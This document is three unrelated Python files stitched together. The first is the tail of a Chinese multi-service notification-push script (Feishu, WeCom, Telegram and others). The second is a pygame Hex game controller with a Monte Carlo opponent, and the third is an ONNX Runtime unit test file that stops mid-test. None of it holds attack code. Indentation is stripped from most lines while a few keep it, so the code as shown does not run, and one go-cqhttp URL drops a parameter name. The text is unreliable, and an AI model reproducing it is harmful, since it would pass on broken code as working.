    Push a message via the Feishu bot.
"""
if not push_config.get("FSKEY"):
print("飞书 服务的 FSKEY 未设置!!\n取消推送")
return
print("飞书 服务启动")
url = f'https://open.feishu.cn/open-apis/bot/v2/hook/{push_config.get("FSKEY")}'
data = {"msg_type": "text", "content": {"text": f"{title}\n\n{content}"}}
response = requests.post(url, data=json.dumps(data)).json()
if response.get("StatusCode") == 0:
print("飞书 推送成功!")
else:
print("飞书 推送失败!错误信息如下:\n", response)
def go_cqhttp(title: str, content: str) -> None:
"""
    Push a message via go_cqhttp.
"""
if not push_config.get("GOBOT_URL") or not push_config.get("GOBOT_QQ"):
print("go-cqhttp 服务的 GOBOT_URL 或 GOBOT_QQ 未设置!!\n取消推送")
return
print("go-cqhttp 服务启动")
url = f'{push_config.get("GOBOT_URL")}?access_token={push_config.get("GOBOT_TOKEN")}&{push_config.get("GOBOT_QQ")}&message=标题:{title}\n内容:{content}'
response = requests.get(url).json()
if response["status"] == "ok":
print("go-cqhttp 推送成功!")
else:
print("go-cqhttp 推送失败!")
def iGot(title: str, content: str) -> None:
"""
    Push a message via iGot.
"""
if not push_config.get("IGOT_PUSH_KEY"):
print("iGot 服务的 IGOT_PUSH_KEY 未设置!!\n取消推送")
return
print("iGot 服务启动")
url = f'https://push.hellyw.com/{push_config.get("IGOT_PUSH_KEY")}'
data = {"title": title, "content": content}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(url, data=data, headers=headers).json()
if response["ret"] == 0:
print("iGot 推送成功!")
else:
print(f'iGot 推送失败!{response["errMsg"]}')
def serverJ(title: str, content: str) -> None:
"""
    Push a message via ServerChan (serverJ).
"""
if not push_config.get("PUSH_KEY"):
print("serverJ 服务的 PUSH_KEY 未设置!!\n取消推送")
return
print("serverJ 服务启动")
data = {"text": title, "desp": content.replace("\n", "\n\n")}
    if "SCT" in push_config.get("PUSH_KEY"):
        url = f'https://sctapi.ftqq.com/{push_config.get("PUSH_KEY")}.send'
    else:
        url = f'https://sc.ftqq.com/{push_config.get("PUSH_KEY")}.send'
response = requests.post(url, data=data).json()
if response.get("errno") == 0 or response.get("code") == 0:
print("serverJ 推送成功!")
else:
print(f'serverJ 推送失败!错误码:{response["message"]}')
def pushplus_bot(title: str, content: str) -> None:
"""
    Push a message via push+ (pushplus).
"""
if not push_config.get("PUSH_PLUS_TOKEN"):
print("PUSHPLUS 服务的 PUSH_PLUS_TOKEN 未设置!!\n取消推送")
return
print("PUSHPLUS 服务启动")
url = "http://www.pushplus.plus/send"
data = {
"token": push_config.get("PUSH_PLUS_TOKEN"),
"title": title,
"content": content,
"topic": push_config.get("PUSH_PLUS_USER"),
}
body = json.dumps(data).encode(encoding="utf-8")
headers = {"Content-Type": "application/json"}
response = requests.post(url=url, data=body, headers=headers).json()
if response["code"] == 200:
print("PUSHPLUS 推送成功!")
else:
print("PUSHPLUS 推送失败!")
def qmsg_bot(title: str, content: str) -> None:
"""
    Push a message via Qmsg.
"""
if not push_config.get("QMSG_KEY") or not push_config.get("QMSG_TYPE"):
print("qmsg 的 QMSG_KEY 或者 QMSG_TYPE 未设置!!\n取消推送")
return
print("qmsg 服务启动")
url = f'https://qmsg.zendee.cn/{push_config.get("QMSG_TYPE")}/{push_config.get("QMSG_KEY")}'
payload = {"msg": f'{title}\n\n{content.replace("----", "-")}'.encode("utf-8")}
response = requests.post(url=url, params=payload).json()
if response["code"] == 0:
print("qmsg 推送成功!")
else:
print(f'qmsg 推送失败!{response["reason"]}')
def wecom_app(title: str, content: str) -> None:
"""
    Push a message via a WeCom (WeChat Work) application.
"""
if not push_config.get("QYWX_AM"):
print("QYWX_AM 未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(",", push_config.get("QYWX_AM"))
    if len(QYWX_AM_AY) not in (4, 5):
print("QYWX_AM 设置错误!!\n取消推送")
return
print("企业微信 APP 服务启动")
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except IndexError:
media_id = ""
wx = WeCom(corpid, corpsecret, agentid)
    # If media_id is not configured, send as plain text by default
if not media_id:
message = title + "\n\n" + content
response = wx.send_text(message, touser)
else:
response = wx.send_mpnews(title, content, media_id, touser)
if response == "ok":
print("企业微信推送成功!")
else:
print("企业微信推送失败!错误信息如下:\n", response)
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken"
values = {
"corpid": self.CORPID,
"corpsecret": self.CORPSECRET,
}
req = requests.post(url, params=values)
data = json.loads(req.text)
return data["access_token"]
def send_text(self, message, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {"content": message},
"safe": "0",
}
send_msges = bytes(json.dumps(send_values), "utf-8")
        response = requests.post(send_url, send_msges)
        response = response.json()
        return response["errmsg"]
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace("\n", "<br/>"),
"digest": message,
}
]
},
}
send_msges = bytes(json.dumps(send_values), "utf-8")
        response = requests.post(send_url, send_msges)
        response = response.json()
        return response["errmsg"]
def wecom_bot(title: str, content: str) -> None:
"""
    Push a message via a WeCom (WeChat Work) group bot.
"""
if not push_config.get("QYWX_KEY"):
print("企业微信机器人 服务的 QYWX_KEY 未设置!!\n取消推送")
return
print("企业微信机器人服务启动")
url = f"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={push_config.get('QYWX_KEY')}"
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if response["errcode"] == 0:
print("企业微信机器人推送成功!")
else:
print("企业微信机器人推送失败!")
def telegram_bot(title: str, content: str) -> None:
"""
    Push a message via a Telegram bot.
"""
if not push_config.get("TG_BOT_TOKEN") or not push_config.get("TG_USER_ID"):
print("tg 服务的 bot_token 或者 user_id 未设置!!\n取消推送")
return
print("tg 服务启动")
if push_config.get("TG_API_HOST"):
url = f"https://{push_config.get('TG_API_HOST')}/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
else:
url = (
f"https://api.telegram.org/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
payload = {
"chat_id": str(push_config.get("TG_USER_ID")),
"text": f"{title}\n\n{content}",
"disable_web_page_preview": "true",
}
proxies = None
if push_config.get("TG_PROXY_HOST") and push_config.get("TG_PROXY_PORT"):
if push_config.get("TG_PROXY_AUTH") is not None and "@" not in push_config.get(
"TG_PROXY_HOST"
):
push_config["TG_PROXY_HOST"] = (
push_config.get("TG_PROXY_AUTH")
+ "@"
+ push_config.get("TG_PROXY_HOST")
)
proxyStr = "http://{}:{}".format(
push_config.get("TG_PROXY_HOST"), push_config.get("TG_PROXY_PORT")
)
proxies = {"http": proxyStr, "https": proxyStr}
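        # e.g. proxies == {"http": "http://user:pass@host:port", "https": "http://user:pass@host:port"} once the TG_PROXY_* values are set (illustrative values).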
response = requests.post(
url=url, headers=headers, params=payload, proxies=proxies
).json()
if response["ok"]:
print("tg 推送成功!")
else:
print("tg 推送失败!")
def one() -> str:
"""
    Fetch a single Hitokoto quote.
:return:
"""
url = "https://v1.hitokoto.cn/"
res = requests.get(url).json()
return res["hitokoto"] + " ----" + res["from"]
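# one() returns a string of the form "<quote> ----<source>" fetched from v1.hitokoto.cn.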
######################################## end of push method definitions #############################################
##################################### push option detection: start #############################################
if push_config.get("BARK_PUSH"):
notify_function.append(bark)
if push_config.get("CONSOLE"):
notify_function.append(console)
if push_config.get("DD_BOT_TOKEN") and push_config.get("DD_BOT_SECRET"):
notify_function.append(dingding_bot)
if push_config.get("FSKEY"):
notify_function.append(feishu_bot)
if push_config.get("GOBOT_URL") and push_config.get("GOBOT_QQ"):
notify_function.append(go_cqhttp)
if push_config.get("IGOT_PUSH_KEY"):
notify_function.append(iGot)
if push_config.get("PUSH_KEY"):
notify_function.append(serverJ)
if push_config.get("PUSH_PLUS_TOKEN"):
notify_function.append(pushplus_bot)
if push_config.get("QMSG_KEY") and push_config.get("QMSG_TYPE"):
notify_function.append(qmsg_bot)
if push_config.get("QYWX_AM"):
notify_function.append(wecom_app)
if push_config.get("QYWX_KEY"):
notify_function.append(wecom_bot)
if push_config.get("TG_BOT_TOKEN") and push_config.get("TG_USER_ID"):
notify_function.append(telegram_bot)
##################################### push option detection: end #############################################
def send(title: str, content: str) -> None:
if not content:
print(f"{title} 推送内容为空!")
return
hitokoto = push_config.get("HITOKOTO")
text = one() if hitokoto else ""
content += "\n\n" + text
ts = [
threading.Thread(target=mode, args=(title, content), name=mode.__name__)
for mode in notify_function
]
[t.start() for t in ts]
[t.join() for t in ts]
def main():
send("title", "content")
if __name__ == "__main__":
main()
|
controller.py
|
import pygame
import globvar
import monte_carlo
import logging
import threading
import time
class HexController():
def __init__(self):
self.STOPMSG = pygame.USEREVENT + 1
self.mouse_pos = (-1, -1)
self.pos_on_board = None
self.on_button = (False, None)
self.buttons = {"newgame": 0, "menu": 1, "REAL PLAYER": 2, "AI PLAYER": 2,
"undo": 3, "LEVEL": 4, "SIZE": 5, "START": 6, "CONTINUE": 7, "WIN %": 8, "QUIT": 9}
self.print_message = False
self.text = None
self.menu = True
# show winning percentage flag
self.show_win_p = False
def interaction(self):
'''
        This is the main interaction handler. It always returns True unless the user
        clicks the quit button (or closes the window), in which case the game ends in main.py.
'''
# Did the user click the window close button?
for event in pygame.event.get():
if event.type == pygame.QUIT:
return False
elif event.type == pygame.MOUSEMOTION:
self.mouse_pos = pygame.mouse.get_pos()
if self.menu:
globvar.menu.draw_menu(self.mouse_pos)
else:
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
if event.type == pygame.MOUSEBUTTONUP:
if event.button == 1:
if self.menu:
globvar.menu.draw_menu(self.mouse_pos)
elif self.pos_on_board != None:
win_color = self.win_color()[0]
if win_color == "":
# nobody wins yet
chess_status = globvar.hex_brd.place_chess(self.pos_on_board)
if chess_status == False and not self.on_button[0]:
                                # if the user tries to place on a non-empty cell
self.show_message('please place chess on empty position')
else:
# keep placed info, and check winner
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
win_color,winner_num = self.win_color()
if win_color != "":
# there is a winner
print("winner is", win_color)
globvar.hex_ctrl.show_message('Player '+win_color+ ' has won')
# self.board = self.init_board()
win_path = globvar.hex_brd.winning_path(globvar.hex_brd.board, winner_num)
print("winning path is:", win_path, "\n")
globvar.hex_brd.win_path = win_path
elif globvar.hex_brd.current_mode == 1: # AI player mode
self.run_thread()
win_color,winner_num = self.win_color()
if win_color != "":
# if there is a winner
print("winner is", win_color)
globvar.hex_ctrl.show_message('Player '+ win_color + ' has won')
print("winner_num ",winner_num)
win_path = globvar.hex_brd.winning_path(globvar.hex_brd.board, winner_num)
print("winning path is:", win_path, "\n")
globvar.hex_brd.win_path = win_path
else:
# if someone won, user trying place..
self.show_message( 'Player ' + win_color + ' has won')
elif not self.on_button[0]:
if globvar.hex_brd.get_winner(globvar.hex_brd.board) == 2:
self.show_message('Do not place chess out of board')
if self.on_button[0]:
button = self.buttons[self.on_button[1].split(':')[0]]
if self.menu:
if not self.press_button(button): # return False if quit button is pressed
return False
if self.menu:
globvar.menu.draw_menu(self.mouse_pos)
else:
#button = self.buttons[self.on_button[1]]
if not self.press_button(button): # return False if quit button is pressed
return False
if not self.menu:
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
if event.type == self.STOPMSG:
pygame.time.set_timer(self.STOPMSG, 0)
self.print_message = False
self.text = None
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
return True
def win_color(self):
'''
        Map the winner number reported by the board to a colour string and
        return (win_color, winner_num).
'''
win_color = ""
winner_num = globvar.hex_brd.get_winner(globvar.hex_brd.board)
if (winner_num) == 1:
win_color = "blue"
elif winner_num == 0:
win_color = "red"
return win_color, winner_num
def show_message(self, text):
'''
        Ask the model to redraw with a message that stays on screen for a short while.
        The `text` argument is the message to display.
'''
# design for show message
self.print_message = True
self.text = text
pygame.time.set_timer(self.STOPMSG, 1000)
globvar.hex_brd.notify_update(self.mouse_pos, text)
def press_button(self, button):
'''
This function will handle the procedure of pressing a button.
        Return True unless the quit button was pressed; return False if it was.
'''
if button == 0: # new game button
globvar.hex_brd.new_game()
elif button == 1: # menu button
self.menu = True
globvar.menu.draw_menu(self.mouse_pos)
elif button == 2: # REAL PLAYER / AI PLAYER mode button
globvar.hex_brd.switch_mode()
elif button == 3: # undo button
if globvar.hex_brd.get_winner(globvar.hex_brd.board) == 2:
globvar.hex_brd.undo()
else:
self.show_message('Cannot Undo, Player'+str(globvar.hex_brd.get_winner(globvar.hex_brd.board)+1) +
' has won')
elif button == 4: # LEVEL (EASY / HARD) button
globvar.menu.level = (globvar.menu.level + 1) % 2
if globvar.menu.level == 0:
globvar.hex_brd.waiting_time = 1
else:
globvar.hex_brd.waiting_time = 10
elif button == 5: # SIZE (board size: 5x5 / 6x6) button
globvar.hex_brd.size = (5, 5) if globvar.hex_brd.size == (6, 6) else (6, 6)
globvar.hex_brd.new_game()
globvar.hex_brd.dump_Monte_Carlo_obj()
globvar.hex_brd.load_Monte_Carlo_Obj()
elif button == 6: # START (new game) button
self.menu = False
globvar.hex_brd.new_game()
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
elif button == 7: # CONTINUE (previous game) button
self.menu = False
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
elif button == 8: # SIMULATION button
self.show_win_p = not self.show_win_p
globvar.hex_brd.monte_carlo.activate = not globvar.hex_brd.monte_carlo.activate
globvar.hex_brd.current_show = (globvar.hex_brd.current_show + 1) % 2
else: # QUIT button
return False
return True
def run_thread(self):
'''
        This function runs two threads:
        Thread 1: Monte Carlo algorithm move generation process
        Thread 2: Count down message display
        so that the user is not left waiting in the middle of the program without
        knowing what is going on.
'''
# https://realpython.com/intro-to-python-threading/
gen_move = threading.Thread(target=self.move_thread_function, args=(1,))
print_loading = threading.Thread(target=self.print_thread_function, args=(2,))
print_loading.start()
gen_move.start()
print_loading.join()
gen_move.join()
pygame.event.clear()
def move_thread_function(self, name):
'''
This function is the process of the first thread. It will call the move function to
generate a move for the current board using Monte Carlo algorithm.
'''
print("generating next move ...")
globvar.hex_brd.move()
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
print("done\n")
def print_thread_function(self, name):
'''
        This function is the process of the second thread. It shows the
        count down message: loading ... X sec
        where X is the number of seconds left to wait. The waiting time depends on
        the current level (1 second in EASY mode, 10 seconds in HARD mode).
'''
waiting_time = globvar.hex_brd.waiting_time - 1
while waiting_time > 0:
self.show_message("loading . . . " + str(waiting_time) + "s")
time.sleep(1)
waiting_time -= 1
|
onnxruntime_test_python.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import gc
import os
import platform
import sys
import threading
import unittest
import numpy as np
from helper import get_name
import onnxruntime as onnxrt
from onnxruntime.capi.onnxruntime_pybind11_state import Fail
# handle change from python 3.8 and on where loading a dll from the current directory needs to be explicitly allowed.
if platform.system() == "Windows" and sys.version_info >= (3, 8):
os.add_dll_directory(os.getcwd())
available_providers = [provider for provider in onnxrt.get_available_providers()]
# TVM EP doesn't support:
# * calling Run() on different threads using the same session object
# * symbolic inputs
# * string inputs
# * byte type inputs
# * object type inputs
# * void type inputs
# * SequenceConstruct operator
# * custom operators
# * testSequenceInsert
# * testSequenceLength
available_providers_without_tvm = [
provider for provider in onnxrt.get_available_providers() if provider not in {"TvmExecutionProvider"}
]
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testTvmImported(self):
if "TvmExecutionProvider" not in onnxrt.get_available_providers():
return
import tvm
self.assertTrue(tvm is not None)
def testModelSerialization(self):
try:
so = onnxrt.SessionOptions()
so.log_severity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(
get_name("mul_1.onnx"),
sess_options=so,
providers=["CPUExecutionProvider"],
)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
except Fail as onnxruntime_error:
if (
str(onnxruntime_error) == "[ONNXRuntimeError] : 1 : FAIL : Unable to serialize model as it contains"
" compiled nodes. Please disable any execution providers which generate compiled nodes."
):
pass
else:
raise onnxruntime_error
def testGetProviders(self):
self.assertTrue("CPUExecutionProvider" in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue("CPUExecutionProvider" == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=onnxrt.get_available_providers())
self.assertTrue("CPUExecutionProvider" in sess.get_providers())
def testEnablingAndDisablingTelemetry(self):
onnxrt.disable_telemetry_events()
# no-op on non-Windows builds
# may be no-op on certain Windows builds based on build configuration
onnxrt.enable_telemetry_events()
def testSetProviders(self):
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CUDAExecutionProvider"])
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue("CUDAExecutionProvider" in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(["CPUExecutionProvider"])
# confirm only CPU Provider is registered now.
self.assertEqual(["CPUExecutionProvider"], sess.get_providers())
def testSetProvidersWithOptions(self):
if "TensorrtExecutionProvider" in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["TensorrtExecutionProvider"])
self.assertIn("TensorrtExecutionProvider", sess.get_providers())
options = sess.get_provider_options()
option = options["TensorrtExecutionProvider"]
self.assertIn("device_id", option)
self.assertIn("trt_max_partition_iterations", option)
self.assertIn("trt_min_subgraph_size", option)
self.assertIn("trt_max_workspace_size", option)
self.assertIn("trt_dump_subgraphs", option)
self.assertIn("trt_engine_cache_enable", option)
self.assertIn("trt_engine_cache_path", option)
self.assertIn("trt_force_sequential_engine_build", option)
max_partition_iterations = option["trt_max_partition_iterations"]
new_max_partition_iterations = int(max_partition_iterations) + 1
min_subgraph_size = option["trt_min_subgraph_size"]
new_min_subgraph_size = int(min_subgraph_size) + 1
ori_max_workspace_size = option["trt_max_workspace_size"]
new_max_workspace_size = int(ori_max_workspace_size) // 2
option = {}
option["trt_max_partition_iterations"] = new_max_partition_iterations
option["trt_min_subgraph_size"] = new_min_subgraph_size
option["trt_max_workspace_size"] = new_max_workspace_size
dump_subgraphs = "true"
option["trt_dump_subgraphs"] = dump_subgraphs
engine_cache_enable = "true"
option["trt_engine_cache_enable"] = engine_cache_enable
engine_cache_path = "./engine_cache"
option["trt_engine_cache_path"] = engine_cache_path
force_sequential_engine_build = "true"
option["trt_force_sequential_engine_build"] = force_sequential_engine_build
sess.set_providers(["TensorrtExecutionProvider"], [option])
options = sess.get_provider_options()
option = options["TensorrtExecutionProvider"]
self.assertEqual(
option["trt_max_partition_iterations"],
str(new_max_partition_iterations),
)
self.assertEqual(option["trt_min_subgraph_size"], str(new_min_subgraph_size))
self.assertEqual(option["trt_max_workspace_size"], str(new_max_workspace_size))
self.assertEqual(option["trt_dump_subgraphs"], "1")
self.assertEqual(option["trt_engine_cache_enable"], "1")
self.assertEqual(option["trt_engine_cache_path"], str(engine_cache_path))
self.assertEqual(option["trt_force_sequential_engine_build"], "1")
            # We currently disable the following test code since not all test machines/GPUs have NVIDIA int8 capability
"""
int8_use_native_calibration_table = "false"
option['trt_int8_use_native_calibration_table'] = int8_use_native_calibration_table
int8_enable = "true"
option['trt_int8_enable'] = int8_enable
            calib_table_name = '/home/onnxruntime/table.flatbuffers'  # this file does not exist
option['trt_int8_calibration_table_name'] = calib_table_name
with self.assertRaises(RuntimeError):
sess.set_providers(['TensorrtExecutionProvider'], [option])
"""
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
import ctypes
import sys
CUDA_SUCCESS = 0
def runBaseTest1():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CUDAExecutionProvider"])
self.assertTrue("CUDAExecutionProvider" in sess.get_providers())
option1 = {"device_id": 0}
sess.set_providers(["CUDAExecutionProvider"], [option1])
self.assertEqual(
["CUDAExecutionProvider", "CPUExecutionProvider"],
sess.get_providers(),
)
option2 = {"device_id": -1}
with self.assertRaises(RuntimeError):
sess.set_providers(["CUDAExecutionProvider"], [option2])
sess.set_providers(["CUDAExecutionProvider", "CPUExecutionProvider"], [option1, {}])
self.assertEqual(
["CUDAExecutionProvider", "CPUExecutionProvider"],
sess.get_providers(),
)
def runBaseTest2():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CUDAExecutionProvider"])
self.assertIn("CUDAExecutionProvider", sess.get_providers())
# test get/set of "gpu_mem_limit" configuration.
options = sess.get_provider_options()
self.assertIn("CUDAExecutionProvider", options)
option = options["CUDAExecutionProvider"]
self.assertIn("gpu_mem_limit", option)
ori_mem_limit = option["gpu_mem_limit"]
new_mem_limit = int(ori_mem_limit) // 2
option["gpu_mem_limit"] = new_mem_limit
sess.set_providers(["CUDAExecutionProvider"], [option])
options = sess.get_provider_options()
self.assertEqual(
options["CUDAExecutionProvider"]["gpu_mem_limit"],
str(new_mem_limit),
)
option["gpu_mem_limit"] = ori_mem_limit
sess.set_providers(["CUDAExecutionProvider"], [option])
options = sess.get_provider_options()
self.assertEqual(options["CUDAExecutionProvider"]["gpu_mem_limit"], ori_mem_limit)
def test_get_and_set_option_with_values(option_name, option_values):
provider_options = sess.get_provider_options()
self.assertIn("CUDAExecutionProvider", provider_options)
                    cuda_options = provider_options["CUDAExecutionProvider"]
self.assertIn(option_name, cuda_options)
for option_value in option_values:
cuda_options[option_name] = option_value
sess.set_providers(["CUDAExecutionProvider"], [cuda_options])
new_provider_options = sess.get_provider_options()
self.assertEqual(
new_provider_options.get("CUDAExecutionProvider", {}).get(option_name),
str(option_value),
)
test_get_and_set_option_with_values("arena_extend_strategy", ["kNextPowerOfTwo", "kSameAsRequested"])
test_get_and_set_option_with_values("cudnn_conv_algo_search", ["DEFAULT", "EXHAUSTIVE", "HEURISTIC"])
test_get_and_set_option_with_values("do_copy_in_default_stream", [0, 1])
option["gpu_external_alloc"] = "0"
option["gpu_external_free"] = "0"
option["gpu_external_empty_cache"] = "0"
sess.set_providers(["CUDAExecutionProvider"], [option])
options = sess.get_provider_options()
self.assertEqual(options["CUDAExecutionProvider"]["gpu_external_alloc"], "0")
self.assertEqual(options["CUDAExecutionProvider"]["gpu_external_free"], "0")
self.assertEqual(options["CUDAExecutionProvider"]["gpu_external_empty_cache"], "0")
#
# Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
# so run them last. Each set_providers call will attempt to re-create a session, so it's
# fine for a test that fails to run immediately after another one that fails.
# Alternatively a valid call to set_providers could be used to recreate the underlying session
# after a failed call.
#
option["arena_extend_strategy"] = "wrong_value"
with self.assertRaises(RuntimeError):
sess.set_providers(["CUDAExecutionProvider"], [option])
option["gpu_mem_limit"] = -1024
with self.assertRaises(RuntimeError):
sess.set_providers(["CUDAExecutionProvider"], [option])
option["gpu_mem_limit"] = 1024.1024
with self.assertRaises(RuntimeError):
sess.set_providers(["CUDAExecutionProvider"], [option])
option["gpu_mem_limit"] = "wrong_value"
with self.assertRaises(RuntimeError):
sess.set_providers(["CUDAExecutionProvider"], [option])
def getCudaDeviceCount():
import ctypes
num_device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
result = cuda.cuInit(0)
result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
return -1
return num_device.value
def setDeviceIdTest(i):
import ctypes
import onnxruntime as onnxrt
device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CPUExecutionProvider"])
option = {"device_id": i}
sess.set_providers(["CUDAExecutionProvider"], [option])
self.assertEqual(
["CUDAExecutionProvider", "CPUExecutionProvider"],
sess.get_providers(),
)
result = cuda.cuCtxGetDevice(ctypes.byref(device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
self.assertEqual(result, CUDA_SUCCESS)
self.assertEqual(i, device.value)
def runAdvancedTest():
num_device = getCudaDeviceCount()
if num_device < 0:
return
# Configure session to be ready to run on all available cuda devices
for i in range(num_device):
setDeviceIdTest(i)
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CPUExecutionProvider"])
# configure session with invalid option values and that should fail
with self.assertRaises(RuntimeError):
option = {"device_id": num_device}
sess.set_providers(["CUDAExecutionProvider"], [option])
option = {"device_id": "invalid_value"}
sess.set_providers(["CUDAExecutionProvider"], [option])
# configure session with invalid option should fail
with self.assertRaises(RuntimeError):
option = {"invalid_option": 123}
sess.set_providers(["CUDAExecutionProvider"], [option])
libnames = ("libcuda.so", "libcuda.dylib", "cuda.dll")
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
runBaseTest1()
runBaseTest2()
runAdvancedTest()
except OSError:
continue
else:
break
else:
runBaseTest1()
runBaseTest2()
# raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(RuntimeError) as context:
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CPUExecutionProvider"])
sess.set_providers(["InvalidProvider"])
self.assertTrue("Unknown Provider Type: InvalidProvider" in str(context.exception))
def testSessionProviders(self):
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CPUExecutionProvider"])
self.assertEqual(["CPUExecutionProvider"], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=available_providers)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content, providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"), providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"), providers=onnxrt.get_available_providers())
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
